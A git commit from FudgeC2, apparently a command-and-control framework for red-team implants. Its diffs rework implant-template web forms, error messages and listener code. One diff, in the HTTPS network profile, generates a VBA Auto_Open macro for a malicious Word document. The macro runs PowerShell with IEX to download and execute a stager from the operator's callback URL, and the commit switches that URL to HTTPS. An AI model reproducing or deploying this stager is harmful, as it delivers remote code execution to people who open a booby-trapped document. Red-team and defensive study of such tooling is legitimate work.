Bug fixes for issue id: 4

Kris Anderson · Kris Anderson · commit cf79923f8976 · 2020-02-11T16:34:40.000Z
- Removed checkboxes in 'New Implant Template' page which breaks new implant creation.
 - Added in working to make the page clearer
 - Added in string interpolation to the page generation to break more robust webforms.
 - Fixed stager generation which was missing sure in httpS for the docm generation
 - Tweaked SqlAlchemy error response. This is commonly seen when a user resubmits the page and tries to recreate an existing template
diff --git a/FudgeC2/Data/DatabaseImplant.py b/FudgeC2/Data/DatabaseImplant.py
@@ -47,8 +47,8 @@ def create_new_implant_template(self, user, cid, config):
             return True
 
         except Exception as e:
-            print(f"Error in create_new_implant_template(): {e}")
-            return e
+            error = f"Error in create_new_implant_template() SQLAlc error: {e}"
+            return error
 
     def Get_AllImplantBaseFromCid(self, cid):
         # -- THIS NEED TO BE REBUILT
diff --git a/FudgeC2/NetworkProfiles/Profiles/BasicHttpProfile/BasicHttpProfile.py b/FudgeC2/NetworkProfiles/Profiles/BasicHttpProfile/BasicHttpProfile.py
@@ -50,13 +50,14 @@ def get_docm_implant_stager(self, implant_data=None):
         return stager_string
 
     def get_webform(self):
-        a = '''
-<div class="checkbox">
-    <label><input type="checkbox" name="BasicHttpProfile" value="off"> Basic HTTP Profile</label>
-    <input type="text" class="form-control" id="BasicHttpProfile" name="BasicHttpProfile" placeholder="TCP Port for binary listener">
-</div>
-'''
-        return a
+        # TODO: Add string interolation on the form tied back to self.profile_tag to ensure that no breaking changes occur if the profile tag is changed.
+
+        webform = (f"<div>"
+                   f"    <label class=\"font-weight-bold\">{self.name}</label>"
+                   f'    <p><span class="font-italic">If left blank this network profile will not be included in the implant.</span><p>'
+                   f'    <input type="text" class="form-control" id="{self.profile_tag}" name="{self.profile_tag}" placeholder="TCP port for HTTP listener">'
+                   f"</div>")
+        return webform
 
     def validate_web_form(self, key, value):
         try:
diff --git a/FudgeC2/NetworkProfiles/Profiles/HttpsProfile/HttpsProfile.py b/FudgeC2/NetworkProfiles/Profiles/HttpsProfile/HttpsProfile.py
@@ -2,7 +2,7 @@
 
 class HttpsProfile:
     name = "HTTPS Profile"
-    description = "This is a basic network profile which use base64 commands and unencrypted traffic"
+    description = "This is a basic network profile which use base64 commands and is encrypted over via standard TLS. Uses 3 seperate enpoints."
     profile_tag = "HttpsProfile"
 
     def get_powershell_code(self):
@@ -43,20 +43,20 @@ def get_docm_implant_stager(self, implant_data=None):
         stager_string = f'''
 Sub Auto_Open()
 Dim exec As String
-exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://{implant_data['callback_url']}:{implant_data['network_profiles'][self.profile_tag]}/error.htm?user={implant_data['stager_key']}'))"""
+exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('https://{implant_data['callback_url']}:{implant_data['network_profiles'][self.profile_tag]}/error.htm?user={implant_data['stager_key']}'))"""
 Shell (exec)
 End Sub
 :return:'''
         return stager_string
 
     def get_webform(self):
-        a = '''
-<div class="checkbox">
-    <label><input type="checkbox" name="HttpsProfile" value="off"> Basic HTTP Profile</label>
-    <input type="text" class="form-control" id="HttpsProfile" name="HttpsProfile" placeholder="TCP Port for binary listener">
-</div>
-'''
-        return a
+        webform = (f"<div>"
+                   f"    <label  class=\"font-weight-bold\" >{self.name}</label>"
+                   f'    <p><span class="font-italic">If left blank this network profile will not be included in the implant.</span><p>'
+                   f'    <input type="text" class="form-control" id="{self.profile_tag}" name="{self.profile_tag}" placeholder="TCP port for HTTPS listener">'
+                   f"</div>")
+
+        return webform
 
     def validate_web_form(self, key, value):
         try:
diff --git a/FudgeC2/ServerApp/ImplantManager.py b/FudgeC2/ServerApp/ImplantManager.py
@@ -28,9 +28,6 @@
 login = LoginManager(app)
 login.init_app(app)
 
-# TODO: Controller dev work.
-listener_management = None
-
 
 # -- Context Processors --#
 @app.context_processor
@@ -218,6 +215,7 @@ def get_listener_details():
         to_return.append(x)
     return jsonify(test=to_return)
 
+
 @app.route("/api/v1/listener/change", methods=['POST'])
 @login_required
 def Listener_Updates():
@@ -229,6 +227,7 @@ def Listener_Updates():
     flash(form_response)
     return redirect(url_for('GlobalListenerPage'))
 
+
 @app.route("/api/v1/listener/create", methods=['POST'])
 @login_required
 def create_new_listener():
diff --git a/FudgeC2/ServerApp/modules/ImplantManagement.py b/FudgeC2/ServerApp/modules/ImplantManagement.py
@@ -22,7 +22,6 @@ def _form_validated_obfucation_level_(self, form):
                 obfuscation_value = 0
             elif obfuscation_value > 4:
                 obfuscation_value = 4
-            print(f"Returning obf_a: {form['obfuscation']} to ofb_b: {obfuscation_value}")
             return obfuscation_value
         except:
             return None
diff --git a/FudgeC2/ServerApp/templates/CreateImplant.html b/FudgeC2/ServerApp/templates/CreateImplant.html
@@ -5,7 +5,7 @@
 <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/tempusdominus-bootstrap-4/5.0.1/css/tempusdominus-bootstrap-4.min.css" />
 
 <div class="row justify-content-md-center m-4">
-    <div class="col-lg-4 rounded p-3">
+    <div class="col-lg-5 rounded p-3">
         <h3>Create Implant Template</h3>
         <form id="Login" method="POST" action="create" name="CI">
             <div class="form-group"><div>Implant title <span class="text-danger">*</span></div>
@@ -23,7 +23,7 @@ <h3>Create Implant Template</h3>
             <div class="form-group">Beacon delay (seconds)
                 <input type="text" class="form-control" name="beacon_delay" id="beacon_delay" value="3600" placeholder="3600">
             </div>
-            <div class="form-group"><b>Implant obfuscation options:</b>
+            <div class="form-group"><b class="font-weight-bold">Implant obfuscation options:</b>
 
                 <div class="form-check">
                   <label class="form-check-label active">
@@ -72,8 +72,10 @@ <h3>Create Implant Template</h3>
             </script>
 
             {% if profiles%}
-            <h4>Network Profiles</h4>
+            <h4>Network Profiles<span class="text-danger">*</span></h4>
+            <div>To include a network profile in your implant simple enter the port it's listener will be listening on. At least one profile is required per implant template, any blank entries are not included</div>
                 {% for profile in profiles%}
+                    <hr>
                     {{ profile | safe }}
                 {% endfor %}
             {% else %}
